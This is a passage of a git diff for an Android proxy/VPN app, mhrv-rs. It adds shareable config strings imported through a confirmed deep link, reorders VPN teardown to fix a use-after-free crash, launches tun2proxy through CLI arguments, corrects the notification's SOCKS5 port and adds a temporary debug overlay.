+    private const val HASH_PREFIX = "mhrv-rs://"
+
+    /** Encode config as a shareable base64 string with prefix.
+     *  Only includes non-default fields to keep the hash short. */
+    fun encode(cfg: MhrvConfig): String {
+        val defaults = MhrvConfig()
+        val obj = JSONObject()
+
+        // Always include essential fields.
+        obj.put("mode", when (cfg.mode) {
+            Mode.APPS_SCRIPT -> "apps_script"
+            Mode.DIRECT -> "direct"
+            Mode.FULL -> "full"
+        })
+        val ids = cfg.appsScriptUrls.mapNotNull { url ->
+            val marker = "/macros/s/"
+            val i = url.indexOf(marker)
+            if (i >= 0) {
+                var s = url.substring(i + marker.length)
+                val slash = s.indexOf('/'); if (slash >= 0) s = s.substring(0, slash)
+                s.trim().ifEmpty { null }
+            } else url.trim().ifEmpty { null }
+        }
+        if (ids.isNotEmpty()) obj.put("script_ids", JSONArray().apply { ids.forEach { put(it) } })
+        if (cfg.authKey.isNotBlank()) obj.put("auth_key", cfg.authKey)
+
+        // Only include non-default values.
+        if (cfg.googleIp != defaults.googleIp) obj.put("google_ip", cfg.googleIp)
+        if (cfg.frontDomain != defaults.frontDomain) obj.put("front_domain", cfg.frontDomain)
+        if (cfg.sniHosts.isNotEmpty()) obj.put("sni_hosts", JSONArray().apply { cfg.sniHosts.forEach { put(it) } })
+        if (cfg.verifySsl != defaults.verifySsl) obj.put("verify_ssl", cfg.verifySsl)
+        if (cfg.logLevel != defaults.logLevel) obj.put("log_level", cfg.logLevel)
+        if (cfg.parallelRelay != defaults.parallelRelay) obj.put("parallel_relay", cfg.parallelRelay)
+        if (cfg.forceHttp1 != defaults.forceHttp1) obj.put("force_http1", cfg.forceHttp1)
+        if (cfg.coalesceStepMs != defaults.coalesceStepMs) obj.put("coalesce_step_ms", cfg.coalesceStepMs)
+        if (cfg.coalesceMaxMs != defaults.coalesceMaxMs) obj.put("coalesce_max_ms", cfg.coalesceMaxMs)
+        if (cfg.blockQuic != defaults.blockQuic) obj.put("block_quic", cfg.blockQuic)
+        if (cfg.blockStun != defaults.blockStun) obj.put("block_stun", cfg.blockStun)
+        if (cfg.upstreamSocks5.isNotBlank()) obj.put("upstream_socks5", cfg.upstreamSocks5)
+        if (cfg.passthroughHosts.isNotEmpty()) obj.put("passthrough_hosts", JSONArray().apply { cfg.passthroughHosts.forEach { put(it) } })
+        if (cfg.tunnelDoh != defaults.tunnelDoh) obj.put("tunnel_doh", cfg.tunnelDoh)
+        if (cfg.blockDoh != defaults.blockDoh) obj.put("block_doh", cfg.blockDoh)
+        if (cfg.youtubeViaRelay != defaults.youtubeViaRelay) obj.put("youtube_via_relay", cfg.youtubeViaRelay)
+        val cleanBypassDohHosts = cfg.bypassDohHosts
+            .map { it.trim() }
+            .filter { it.isNotEmpty() }
+            .distinct()
+        if (cleanBypassDohHosts.isNotEmpty()) {
+            obj.put("bypass_doh_hosts", JSONArray().apply { cleanBypassDohHosts.forEach { put(it) } })
+        }
+
+        // Compress with DEFLATE then base64.
+        val jsonBytes = obj.toString().toByteArray(Charsets.UTF_8)
+        val compressed = java.io.ByteArrayOutputStream().also { bos ->
+            java.util.zip.DeflaterOutputStream(bos).use { it.write(jsonBytes) }
+        }.toByteArray()
+
+        val b64 = android.util.Base64.encodeToString(
+            compressed,
+            android.util.Base64.NO_WRAP or android.util.Base64.URL_SAFE,
+        )
+        return "$HASH_PREFIX$b64"
+    }
+
+    /** Try DEFLATE inflate; fall back to treating bytes as raw UTF-8
+     *  (for backward compat with uncompressed exports). */
+    private fun inflateOrRaw(raw: ByteArray): String {
+        return try {
+            java.util.zip.InflaterInputStream(raw.inputStream()).bufferedReader().readText()
+        } catch (_: Throwable) {
+            String(raw, Charsets.UTF_8)
+        }
+    }
+
+    /** Try to decode an encoded config string or raw JSON. Returns null on failure. */
+    fun decode(encoded: String): MhrvConfig? {
+        val trimmed = encoded.trim()
+        // Try raw JSON first.
+        if (trimmed.startsWith("{")) {
+            return try {
+                val obj = JSONObject(trimmed)
+                if (!obj.has("mode") && !obj.has("script_ids") && !obj.has("auth_key")) null
+                else loadFromJson(obj)
+            } catch (_: Throwable) { null }
+        }
+        // Try mhrv:// base64 encoded (possibly DEFLATE-compressed).
+        val payload = if (trimmed.startsWith(HASH_PREFIX)) trimmed.removePrefix(HASH_PREFIX) else trimmed
+        return try {
+            val raw = android.util.Base64.decode(payload, android.util.Base64.NO_WRAP or android.util.Base64.URL_SAFE)
+            val text = inflateOrRaw(raw)
+            val obj = JSONObject(text)
+            if (!obj.has("mode") && !obj.has("script_ids") && !obj.has("auth_key")) return null
+            loadFromJson(obj)
+        } catch (_: Throwable) {
+            null
+        }
+    }
+
+    /** Check if a string looks like an encoded mhrv config. */
+    fun looksLikeConfig(text: String): Boolean {
+        val t = text.trim()
+        if (t.startsWith(HASH_PREFIX)) return true
+        // Also accept raw JSON with a "mode" field.
+        if (t.startsWith("{")) {
+            return try { JSONObject(t).has("mode") } catch (_: Throwable) { false }
+        }
+        return false
+    }
+
+    /** Parse config from a JSON object — shared by load() and decode(). */
+    private fun loadFromJson(obj: JSONObject): MhrvConfig {
+        val ids = obj.optJSONArray("script_ids")?.let { arr ->
+            buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+        }?.filter { it.isNotBlank() }.orEmpty()
+        val urls = ids.map { "https://script.google.com/macros/s/$it/exec" }
+        val sni = obj.optJSONArray("sni_hosts")?.let { arr ->
+            buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+        }?.filter { it.isNotBlank() }.orEmpty()
+
+        return MhrvConfig(
+            mode = when (obj.optString("mode", "apps_script")) {
+                "direct" -> Mode.DIRECT
+                // Deprecated alias kept forever for back-compat with
+                // configs written before the rename.
+                "google_only" -> Mode.DIRECT
+                "full" -> Mode.FULL
+                else -> Mode.APPS_SCRIPT
+            },
+            listenHost = obj.optString("listen_host", "0.0.0.0"),
+            listenPort = obj.optInt("listen_port", 8080),
+            socks5Port = obj.optInt("socks5_port", 1081).takeIf { it > 0 },
+            appsScriptUrls = urls,
+            authKey = obj.optString("auth_key", ""),
+            frontDomain = obj.optString("front_domain", "www.google.com"),
+            sniHosts = sni,
+            googleIp = obj.optString("google_ip", "142.251.36.68"),
+            verifySsl = obj.optBoolean("verify_ssl", true),
+            logLevel = obj.optString("log_level", "info"),
+            parallelRelay = obj.optInt("parallel_relay", 1),
+            forceHttp1 = obj.optBoolean("force_http1", false),
+            coalesceStepMs = obj.optInt("coalesce_step_ms", 10),
+            coalesceMaxMs = obj.optInt("coalesce_max_ms", 1000),
+            blockQuic = obj.optBoolean("block_quic", true),
+            blockStun = obj.optBoolean("block_stun", true),
+            upstreamSocks5 = obj.optString("upstream_socks5", ""),
+            passthroughHosts = obj.optJSONArray("passthrough_hosts")?.let { arr ->
+                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+            }?.filter { it.isNotBlank() }.orEmpty(),
+            tunnelDoh = obj.optBoolean("tunnel_doh", true),
+            blockDoh = obj.optBoolean("block_doh", true),
+            youtubeViaRelay = obj.optBoolean("youtube_via_relay", false),
+            bypassDohHosts = obj.optJSONArray("bypass_doh_hosts")?.let { arr ->
+                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+            }?.filter { it.isNotBlank() }.orEmpty(),
+            connectionMode = when (obj.optString("connection_mode", "vpn_tun")) {
+                "proxy_only" -> ConnectionMode.PROXY_ONLY
+                else -> ConnectionMode.VPN_TUN
+            },
+            splitMode = when (obj.optString("split_mode", "all")) {
+                "only" -> SplitMode.ONLY
+                "except" -> SplitMode.EXCEPT
+                else -> SplitMode.ALL
+            },
+            splitApps = obj.optJSONArray("split_apps")?.let { arr ->
+                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
+            }?.filter { it.isNotBlank() }.orEmpty(),
+            uiLang = when (obj.optString("ui_lang", "auto")) {
+                "fa" -> UiLang.FA
+                "en" -> UiLang.EN
+                else -> UiLang.AUTO
+            },
+        )
+    }
 }
 
 /**
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt b/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt
index 5aedb33c..4fb12312 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/MainActivity.kt
@@ -81,6 +81,8 @@ class MainActivity : AppCompatActivity() {
             }
         }
 
+        handleDeepLink(intent)
+
         setContent {
             MhrvTheme {
                 AppRoot()
@@ -88,6 +90,22 @@ class MainActivity : AppCompatActivity() {
         }
     }
 
+    override fun onNewIntent(intent: Intent) {
+        super.onNewIntent(intent)
+        handleDeepLink(intent)
+    }
+
+    /** Stash decoded config from deep link for the UI to confirm — never
+     *  auto-import. The composable reads this and shows a confirmation
+     *  dialog with the deployment IDs and a trust warning. */
+    private fun handleDeepLink(intent: Intent?) {
+        val data = intent?.data ?: return
+        if (data.scheme != "mhrv-rs") return
+        val cfg = ConfigStore.decode(data.toString()) ?: return
+        pendingDeepLinkConfig.value = cfg
+    }
+
+
     @Composable
     private fun AppRoot() {
         // The system VpnService.prepare() returns an Intent if the user
@@ -155,30 +173,36 @@ class MainActivity : AppCompatActivity() {
                 }
             },
             onStop = {
-                // Three-step teardown. Each step is defensive against a
-                // different failure mode we've actually hit in testing:
-                //
-                //   1. ACTION_STOP — graceful path. The service receives it,
-                //      runs its teardown (stops tun2proxy, closes the TUN
-                //      fd, shuts down the Rust runtime) and stopSelf()'s.
-                //      This is what we want 99% of the time.
+                // Single-step graceful teardown. ACTION_STOP delivered via
+                // startService() reaches MhrvVpnService.onStartCommand,
+                // which spawns the `mhrv-teardown` background thread that
+                // tears down tun2proxy + the Rust runtime and then calls
+                // stopSelf() at the end of teardown. Service stops on its
+                // own — we don't need (and must not) follow up with
+                // stopService().
                 //
-                //   2. stopService() — covers the "force-closed then
-                //      reopened" zombie case. Android may auto-restart our
-                //      START_STICKY service in a fresh process after the
-                //      user swipes us away from Recents, and the user's
-                //      next Stop tap needs to actually unbind even if our
-                //      in-memory TUN fd reference is gone. stopService is
-                //      idempotent so it's safe to follow the graceful path.
+                // History (#666 from @ilok67): we used to call stopService()
+                // immediately after startService(stopAction), as belt-and-
+                // suspenders against a "force-closed then reopened zombie"
+                // case. That second call was firing onDestroy() while the
+                // mhrv-teardown thread was still running, racing two threads
+                // through the lifecycle and crashing on tap-to-disconnect.
+                // The teardown thread's idempotency guard (tornDown
+                // AtomicBoolean) protects against double-teardown of native
+                // state, but it can't protect against OS-level lifecycle
+                // races on stopSelf vs stopService. ACTION_STOP alone is
+                // enough for both the live-service and zombie cases —
+                // startService creates a fresh service in the new process
+                // for zombies, runs teardown (no-op on already-clean state)
+                // and stops it.
                 //
-                //   3. We do NOT touch the VpnService permission — that's
-                //      the OS-wide VPN grant and the user approved it
-                //      deliberately. Revoking it would force a re-prompt
-                //      on next Start, which is worse UX.
+                // We do NOT touch the VpnService permission — that's the
+                // OS-wide VPN grant and the user approved it deliberately.
+                // Revoking it would force a re-prompt on next Start, which
+                // is worse UX.
                 val stopAction = Intent(this, MhrvVpnService::class.java)
                     .setAction(MhrvVpnService.ACTION_STOP)
                 startService(stopAction)
-                stopService(Intent(this, MhrvVpnService::class.java))
             },
             onInstallCaConfirmed = {
                 // The flow is (1) export cert, (2) copy it to Downloads so
@@ -237,5 +261,7 @@ class MainActivity : AppCompatActivity() {
 
     companion object {
         private const val REQ_NOTIF = 42
+        /** Deep link config waiting for user confirmation. Read by ConfigSharingBar. */
+        val pendingDeepLinkConfig = mutableStateOf<MhrvConfig?>(null)
     }
 }
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt b/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt
index ffa71541..1e721ec4 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/MhrvApp.kt
@@ -42,11 +42,18 @@ class MhrvApp : Application() {
         )
         val previous = Thread.getDefaultUncaughtExceptionHandler()
         Thread.setDefaultUncaughtExceptionHandler { thread, throwable ->
-            Log.e(
-                CRASH_TAG,
-                "uncaught on thread=${thread.name} (id=${thread.id}): ${throwable.message}",
-                throwable,
-            )
+            // Log.e itself can throw on extreme conditions (logd dead,
+            // OOM allocating the formatted message). If we let that
+            // bubble up, we'd recurse into our own handler with a
+            // half-handled original exception; swallow it so the
+            // previous handler still fires with the real failure.
+            try {
+                Log.e(
+                    CRASH_TAG,
+                    "uncaught on thread=${thread.name} (id=${thread.id}): ${throwable.message}",
+                    throwable,
+                )
+            } catch (_: Throwable) { }
             // Let the default handler still terminate the process and
             // show the system "app closed" dialog — we just wanted to
             // get a log line out the door first.
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt b/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt
index c630a8d9..59aebb79 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/MhrvVpnService.kt
@@ -35,6 +35,7 @@ class MhrvVpnService : VpnService() {
     private var proxyHandle: Long = 0L
     private var tun2proxyThread: Thread? = null
     private val tun2proxyRunning = AtomicBoolean(false)
+    private var debugOverlay: PipelineDebugOverlay? = null
 
     // Idempotency guard. teardown() is reachable from three paths:
     //   1. ACTION_STOP onStartCommand branch (background thread)
@@ -91,13 +92,23 @@ class MhrvVpnService : VpnService() {
         // path below MUST therefore happen after a `startForeground()`
         // call — otherwise the user-visible symptom is "the app crashes
         // the instant I tap Start". See issue #73.
-        startForeground(NOTIF_ID, buildNotif(cfg.listenPort))
+        // Issue #211: notification used to display
+        // `127.0.0.1:${listenPort + 1}` for the SOCKS5 port, which is
+        // wrong whenever socks5Port doesn't equal listenPort+1. With the
+        // default Android config (listenPort=8080, socks5Port=1081)
+        // users saw "Routing via SOCKS5 127.0.0.1:8081" but the real
+        // listener was on 1081 — so per-app SOCKS5 setup against the
+        // notification value silently failed. Pass the actual socks5Port
+        // (after the same elvis fallback used elsewhere) so the
+        // notification matches reality.
+        val notifSocks5Port = cfg.socks5Port ?: (cfg.listenPort + 1)
+        startForeground(NOTIF_ID, buildNotif(cfg.listenPort, notifSocks5Port))
 
         // Deployment ID + auth key are required for apps_script and full
-        // modes — both talk to Apps Script. Only google_only (bootstrap)
-        // runs without them. Closes #73 regression where google_only
-        // users hit this branch and crashed on startForeground timeout.
-        val needsCreds = cfg.mode != Mode.GOOGLE_ONLY
+        // modes — both talk to Apps Script. Only `direct` mode runs
+        // without them. Closes #73 regression where direct-mode users
+        // hit this branch and crashed on startForeground timeout.
+        val needsCreds = cfg.mode != Mode.DIRECT
         if (needsCreds && (!cfg.hasDeploymentId || cfg.authKey.isBlank())) {
             Log.e(TAG, "Config is incomplete — deployment ID + auth key required for ${cfg.mode}")
             try { stopForeground(STOP_FOREGROUND_REMOVE) } catch (_: Throwable) {}
@@ -139,6 +150,7 @@ class MhrvVpnService : VpnService() {
             Log.i(TAG, "PROXY_ONLY mode: listeners up, skipping VpnService/TUN")
             VpnState.setProxyHandle(proxyHandle)
             VpnState.setRunning(true)
+            showDebugOverlay()
             return
         }
 
@@ -242,29 +254,56 @@ class MhrvVpnService : VpnService() {
         tun = parcelFd
 
         // 3) Start tun2proxy on a worker thread. It blocks until stop() or
-        //    shutdown. We detach the fd so ownership transfers cleanly; the
-        //    ParcelFileDescriptor (`tun`) still holds a reference, so closing
-        //    it at teardown reliably tears down the TUN even if tun2proxy
-        //    doesn't cleanly exit.
+        //    shutdown. We detach the fd so ownership transfers cleanly to
+        //    tun2proxy (closeFdOnDrop = true closes it on return from run()).
+        //    The ParcelFileDescriptor (`tun`) we keep is post-detach — its
+        //    own close() is a no-op for the underlying fd, so the worker is
+        //    the sole owner once it's running.
         val detachedFd = parcelFd.detachFd()
         tun2proxyRunning.set(true)
-        tun2proxyThread = Thread({
+        // Use tun2proxy_run_with_cli_args C API via dlsym — gives full
+        // CLI flexibility including --udpgw-server, no fork needed.
+        val cliArgs = buildString {
+            append("tun2proxy")
+            append(" --proxy socks5://127.0.0.1:$socks5Port")
+            append(" --tun-fd $detachedFd")
+            append(" --dns virtual")
+            append(" --verbosity info")
+            append(" --close-fd-on-drop true")
+            if (cfg.mode == Mode.FULL) append(" --udpgw-server $UDPGW_MAGIC_DEST")
+        }
+        val worker = Thread({
             try {
-                val rc = Tun2proxy.run(
-                    "socks5://127.0.0.1:$socks5Port",
-                    detachedFd,
-                    /* closeFdOnDrop = */ true,
-                    MTU.toChar(),
-                    /* verbosity = info */ 3,
-                    /* dnsStrategy = virtual */ 0,
-                )
+                val rc = Native.runTun2proxy(cliArgs, MTU)
                 Log.i(TAG, "tun2proxy exited rc=$rc")
             } catch (t: Throwable) {
                 Log.e(TAG, "tun2proxy crashed: ${t.message}", t)
             } finally {
                 tun2proxyRunning.set(false)
             }
-        }, "tun2proxy").apply { start() }
+        }, "tun2proxy")
+        try {
+            worker.start()
+            tun2proxyThread = worker
+        } catch (t: Throwable) {
+            // Thread.start can throw OutOfMemoryError under extreme memory
+            // pressure. The fd we just detached has no owner — without an
+            // explicit close it leaks for the life of the process. Adopt
+            // it into a fresh ParcelFileDescriptor purely so we can call
+            // close() on it.
+            Log.e(TAG, "tun2proxy thread start failed: ${t.message}", t)
+            tun2proxyRunning.set(false)
+            try {
+                ParcelFileDescriptor.adoptFd(detachedFd).close()
+            } catch (closeErr: Throwable) {
+                Log.w(TAG, "adoptFd($detachedFd).close failed: ${closeErr.message}")
+            }
+            Native.stopProxy(proxyHandle)
+            proxyHandle = 0L
+            try { stopForeground(STOP_FOREGROUND_REMOVE) } catch (_: Throwable) {}
+            stopSelf()
+            return
+        }
 
         // (startForeground was already called at the top of this method
         // to satisfy Android 8+'s foreground-service contract — see the
@@ -277,6 +316,16 @@ class MhrvVpnService : VpnService() {
         // a failed-to-establish run.
         VpnState.setProxyHandle(proxyHandle)
         VpnState.setRunning(true)
+        showDebugOverlay()
+    }
+
+    private fun showDebugOverlay() {
+        if (debugOverlay != null) return
+        if (!android.provider.Settings.canDrawOverlays(this)) {
+            Log.w(TAG, "overlay permission not granted — skipping debug overlay")
+            return
+        }
+        debugOverlay = PipelineDebugOverlay(this).also { it.show() }
     }
 
     /**
@@ -291,12 +340,41 @@ class MhrvVpnService : VpnService() {
      * tun2proxy still forwarding packets into a half-dead Rust runtime
      * while the runtime is force-aborting its tasks — that's the scenario
      * that manifested as "Stop crashes the app" when there were in-flight
-     * relay requests piled up against a dead Apps Script deployment. The
-     * correct order is:
-     *   1. Signal tun2proxy to stop (cooperative).
-     *   2. Close the TUN fd — forces tun2proxy's read() to return EBADF.
-     *   3. Join the tun2proxy thread (now it really will exit).
-     *   4. Shut down the Rust proxy runtime (nothing left to forward to).
+     * relay requests piled up against a dead Apps Script deployment.
+     *
+     * Steps, with the bound on each one called out so a hung native call
+     * cannot stall the whole teardown thread:
+     *   1. Shut down the Rust proxy FIRST. This closes the listening
+     *      SOCKS5 socket that tun2proxy's worker thread is blocked on
+     *      a read() from. Killing the upstream socket is what makes the
+     *      worker's blocking native call return — we have no other lever
+     *      to wake it. Bounded by `rt.shutdown_timeout(3s)` Rust-side.
+     *   2. Signal tun2proxy to stop (cooperative). Mostly redundant after
+     *      step 1, but cheap and covers the rare path where the worker is
+     *      blocked on something other than its socket read (e.g. a
+     *      smoltcp internal queue waiting on a wake). Bounded by a 2s
+     *      side-thread join.
+     *   3. Drop our `ParcelFileDescriptor` reference. Because we already
+     *      called detachFd() at startup, this is a no-op for the
+     *      underlying fd — the worker (closeFdOnDrop=true) owns it.
+     *      We keep the call only so the PROXY_ONLY / failed-establish
+     *      paths still null out the field cleanly.
+     *   4. Join the tun2proxy thread, bounded at 4s. With step 1 having
+     *      already closed the socket the worker was reading from, this
+     *      join almost always completes well under the deadline.
+     *
+     * History (#700 from @ilok67): the original order was
+     * tun2proxy → tun.close → join → stopProxy. That ordering crashed
+     * SIGSEGV ~2s after Disconnect because Native.stopProxy() freed the
+     * Rust runtime (including the SOCKS5 listener) while tun2proxy's
+     * worker was still in a blocking native read against it — classic
+     * use-after-free. The previous comment claimed "the runtime shutdown
+     * below will knock the rest of the world over," but Native.stopProxy
+     * cannot forcibly terminate a separate native thread; it just frees
+     * memory the other thread is still using. Reversing the order means
+     * the worker's blocking read returns with an EOF / socket-closed
+     * error, the worker exits through its own error path, and the join
+     * is effectively just confirming a clean shutdown.
      */
     private fun teardown() {
         // Idempotency guard. Without this, onDestroy racing the
@@ -315,25 +393,50 @@ class MhrvVpnService : VpnService() {
             "(tun2proxy running=${tun2proxyRunning.get()}, proxyHandle=$proxyHandle)",
         )
 
-        // 1. Cooperative stop signal.
+        // 1. Stop the Rust proxy FIRST. Closing the SOCKS5 listener is
+        //    what makes tun2proxy's worker thread's blocking read return
+        //    — without this the worker stays in native code and a later
+        //    Native.stopProxy would race it into use-after-free (#700).
+        val handle = proxyHandle
+        proxyHandle = 0L
+        if (handle != 0L) {
+            Log.i(TAG, "teardown: stopping proxy handle=$handle")
+            try { Native.stopProxy(handle) } catch (t: Throwable) {
+                Log.e(TAG, "Native.stopProxy threw: ${t.message}", t)
+            }
+        }
+
+        // 2. Cooperative stop signal — mostly redundant now that step 1
+        //    has yanked the socket out from under the worker, but cheap
+        //    and covers any future code path where the worker might be
+        //    blocked on something other than its upstream socket read.
+        //    Bounded so a hung JNI call can't stall teardown.
         if (tun2proxyRunning.get()) {
-            try { Tun2proxy.stop() } catch (t: Throwable) {
-                Log.w(TAG, "Tun2proxy.stop: ${t.message}")
+            val stopper = Thread({
+                try { Tun2proxy.stop() } catch (t: Throwable) {
+                    Log.w(TAG, "Tun2proxy.stop: ${t.message}")
+                }
+            }, "mhrv-tun2proxy-stop").apply { start() }
+            try { stopper.join(2_000) } catch (_: InterruptedException) {}
+            if (stopper.isAlive) {
+                Log.w(TAG, "Tun2proxy.stop did not return within 2s — proceeding")
             }
         }
 
-        // 2. Close the TUN fd. Since we called detachFd earlier the
-        //    ParcelFileDescriptor no longer owns the fd and close() here
-        //    is a no-op; the real fd is owned by tun2proxy (closeFdOnDrop
-        //    = true), which closes it on return from run().
+        // 3. Drop our PFD reference. detachFd at startup means this
+        //    close() is a no-op for the underlying fd — tun2proxy owns
+        //    it (closeFdOnDrop = true) and closes it on return from
+        //    run(). The call is kept only to null the field cleanly on
+        //    paths that never reached detachFd (PROXY_ONLY, or an
+        //    establish() that failed mid-builder).
         try { tun?.close() } catch (t: Throwable) {
             Log.w(TAG, "tun.close: ${t.message}")
         }
         tun = null
 
-        // 3. Join the worker. 4s is enough in the happy case; if tun2proxy
-        //    is stuck on something untoward we'd rather move on and force
-        //    the runtime shutdown than hang forever.
+        // 4. Join the worker. With step 1 having killed its upstream this
+        //    almost always completes immediately; the 4s budget is just
+        //    headroom for tun2proxy's internal close path to drain.
         try {
             tun2proxyThread?.join(4_000)
         } catch (_: InterruptedException) {}
@@ -343,18 +446,10 @@ class MhrvVpnService : VpnService() {
             Log.w(TAG, "tun2proxy thread still alive after join timeout — proceeding anyway")
         }
 
-        // 4. Shut down the Rust proxy. Backed by `rt.shutdown_timeout(3s)`
-        //    on the Rust side, so this is bounded even if the runtime
-        //    has in-flight tasks (common when the Apps Script relay has
-        //    piled up pending 30s timeouts).
-        val handle = proxyHandle
-        proxyHandle = 0L
-        if (handle != 0L) {
-            Log.i(TAG, "teardown: stopping proxy handle=$handle")
-            try { Native.stopProxy(handle) } catch (t: Throwable) {
-                Log.e(TAG, "Native.stopProxy threw: ${t.message}", t)
-            }
-        }
+        // Hide debug overlay before flipping UI state.
+        debugOverlay?.hide()
+        debugOverlay = null
+
         // Flip UI state last — the button reverts to Connect only after
         // the native-side cleanup actually happened, not optimistically.
         VpnState.setProxyHandle(0L)
@@ -378,7 +473,7 @@ class MhrvVpnService : VpnService() {
         Log.i(TAG, "onDestroy done")
     }
 
-    private fun buildNotif(proxyPort: Int): Notification {
+    private fun buildNotif(httpPort: Int, socks5Port: Int): Notification {
         val mgr = getSystemService(NotificationManager::class.java)
         if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
             val ch = NotificationChannel(
@@ -405,7 +500,7 @@ class MhrvVpnService : VpnService() {
         )
         return NotificationCompat.Builder(this, CHANNEL_ID)
             .setContentTitle("mhrv-rs VPN is active")
-            .setContentText("Routing via SOCKS5 127.0.0.1:${proxyPort + 1}")
+            .setContentText("HTTP 127.0.0.1:$httpPort  ·  SOCKS5 127.0.0.1:$socks5Port")
             .setSmallIcon(android.R.drawable.presence_online)
             .setContentIntent(openIntent)
             .addAction(android.R.drawable.ic_menu_close_clear_cancel, "Stop", stopIntent)
@@ -420,5 +515,14 @@ class MhrvVpnService : VpnService() {
         private const val NOTIF_ID = 0x1001
         private const val MTU = 1500
         const val ACTION_STOP = "com.therealaleph.mhrv.STOP"
+
+        // Magic udpgw destination passed to tun2proxy in Full mode. MUST stay
+        // outside tun2proxy's --dns virtual range (198.18.0.0/15) — otherwise
+        // virtual DNS can synthesise the magic IP for a real hostname and
+        // silently mis-route its traffic into the udpgw path. See issue #251
+        // and `UDPGW_MAGIC_IP` / `UDPGW_MAGIC_PORT` in tunnel-node/src/udpgw.rs.
+        // Wire-protocol convention: both sides must agree. v1.9.25+ tunnel-nodes
+        // also accept the legacy 198.18.0.1:7300 for one deprecation cycle.
+        private const val UDPGW_MAGIC_DEST = "192.0.2.1:7300"
     }
 }
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/Native.kt b/android/app/src/main/java/com/therealaleph/mhrv/Native.kt
index f016d87e..40482af9 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/Native.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/Native.kt
@@ -83,16 +83,47 @@ object Native {
      * Live traffic/usage counters for a running proxy handle. Returns a
      * JSON blob with the StatsSnapshot fields — or an empty string if the
      * handle is unknown or the proxy isn't using the Apps Script relay
-     * (google_only / full-only modes).
+     * (direct / full-only modes).
      *
      * Schema (all integer fields unless noted):
      *   relay_calls, relay_failures, coalesced, bytes_relayed,
      *   cache_hits, cache_misses, cache_bytes,
      *   blacklisted_scripts, total_scripts,
-     *   today_calls, today_bytes, today_key (string "YYYY-MM-DD"),
-     *   today_reset_secs (seconds until 00:00 UTC rollover)
+     *   today_calls, today_bytes, today_key (string "YYYY-MM-DD" in
+     *     Pacific Time — matches Apps Script's actual quota reset),
+     *   today_reset_secs (seconds until the next 00:00 Pacific Time
+     *     rollover; ~7-8 h offset from UTC depending on DST),
+     *   h2_calls (calls served by the HTTP/2 multiplexed transport,
+     *     across all entry points — Apps-Script direct, exit-node
+     *     outer call, full-mode tunnel single op, full-mode tunnel
+     *     batch. NOT comparable to relay_calls, which only sees the
+     *     Apps-Script-direct path),
+     *   h2_fallbacks (calls that attempted h2 but had to fall back
+     *     to h1 — handshake failure, open backoff, sticky ALPN
+     *     refusal, post-send error retried on h1; same all-entry-
+     *     points scope as h2_calls. Compute h2 health as
+     *     h2_calls / (h2_calls + h2_fallbacks)),
+     *   h2_disabled (boolean: true when h2 fast path is permanently
+     *     off — config force_http1 set, or peer refused h2 via ALPN)
      *
      * Cheap — just reads atomics. Safe to poll on a second-scale timer.
      */
     external fun statsJson(handle: Long): String
+
+    /**
+     * Pipeline debug overlay snapshot. Returns a JSON blob with elevated
+     * session count, batch semaphore usage, and recent ramp/drop events.
+     * Temporary — for debugging pipeline behavior on-device.
+     */
+    external fun pipelineDebugJson(): String
+
+    /**
+     * Start tun2proxy via its CLI args C API (`tun2proxy_run_with_cli_args`).
+     * Resolved at runtime via dlsym from libtun2proxy.so — no fork needed.
+     *
+     * @param cliArgs full CLI string, e.g. "tun2proxy --proxy socks5://... --tun-fd 42 --udpgw-server 192.0.2.1:7300"
+     * @param tunMtu TUN MTU (typically 1500)
+     * @return 0 on normal shutdown, negative on error. BLOCKS.
+     */
+    external fun runTun2proxy(cliArgs: String, tunMtu: Int): Int
 }
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/PipelineDebugOverlay.kt b/android/app/src/main/java/com/therealaleph/mhrv/PipelineDebugOverlay.kt
new file mode 100644
index 00000000..c53ac4ec
--- /dev/null
+++ b/android/app/src/main/java/com/therealaleph/mhrv/PipelineDebugOverlay.kt
@@ -0,0 +1,174 @@
+package com.therealaleph.mhrv
+
+import android.content.Context
+import android.graphics.Color
+import android.graphics.PixelFormat
+import android.os.Handler
+import android.os.Looper
+import android.util.TypedValue
+import android.view.Gravity
+import android.view.MotionEvent
+import android.view.View
+import android.view.WindowManager
+import android.widget.LinearLayout
+import android.widget.TextView
+import org.json.JSONObject
+
+/**
+ * Transparent system overlay showing pipeline debug stats.
+ * Draggable, semi-transparent, shown on top of all apps.
+ * Temporary — remove when pipelining is validated.
+ */
+class PipelineDebugOverlay(private val context: Context) {
+
+    private val wm = context.getSystemService(Context.WINDOW_SERVICE) as WindowManager
+    private val handler = Handler(Looper.getMainLooper())
+    private var root: View? = null
+
+    private lateinit var tvElevated: TextView
+    private lateinit var tvBatches: TextView
+    private lateinit var tvEvents: TextView
+
+    private val pollInterval = 500L
+
+    fun show() {
+        if (root != null) return
+
+        val dp = { px: Int ->
+            TypedValue.applyDimension(TypedValue.COMPLEX_UNIT_DIP, px.toFloat(), context.resources.displayMetrics).toInt()
+        }
+
+        val layout = LinearLayout(context).apply {
+            orientation = LinearLayout.VERTICAL
+            setBackgroundColor(Color.argb(160, 0, 0, 0))
+            setPadding(dp(8), dp(6), dp(8), dp(6))
+        }
+
+        val titleTv = TextView(context).apply {
+            text = "Pipeline Debug"
+            setTextColor(Color.argb(220, 100, 255, 100))
+            textSize = 11f
+        }
+        layout.addView(titleTv)
+
